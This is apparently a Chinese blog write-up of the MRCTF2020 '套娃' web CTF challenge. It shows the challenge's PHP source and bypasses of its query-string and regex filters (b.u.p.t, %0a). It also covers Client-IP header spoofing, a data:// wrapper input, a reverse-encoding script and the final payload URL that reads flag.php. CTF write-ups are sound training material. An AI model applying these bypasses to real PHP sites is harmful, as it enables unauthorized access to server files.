[MRCTF2020]套娃

1.

右键发现源码:

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

1.$_SERVER[‘QUERY_STRING’]不会urlencode。这里主要匹配了_字符,而get会urlencode 本来应该用url绕过但是这里过滤了。
因为在URL中GET请求当输入.或空格或_都会被忽略,所以b_u_p_t即b u p t或b.u.p.t
2.url的%0a为换行污染,可以绕过这个正则,且值不为23333。

?b.u.p.t=23333%0a

进入secrettw.php 发现jsfuck,浏览器内解码
在这里插入图片描述post一个Merak得到源码。

error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>  

这里的file_get_contents($_GET[‘2333’]) === 'todat is a happy day‘ 可以用data为协议绕过,file经过了change函数加密,我们需要逆向。写一个脚本

<?php
function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord($v[$i]) + $i*2 ); 
    } 
    return $re; 
}

function dechange($v){
	$re = '';
	for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord($v[$i]) - $i*2 ); 
    } 
	echo base64_encode($re)."<br>";
	return $re;
}
$a = dechange('flag.php');
echo change(base64_encode($a));

还需要IP是本地,这里是Client-IP:127.0.0.1

payload:secrettw.php?2333=data://text/plain,todat is a happy day&file=ZmpdYSZmXGI=

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值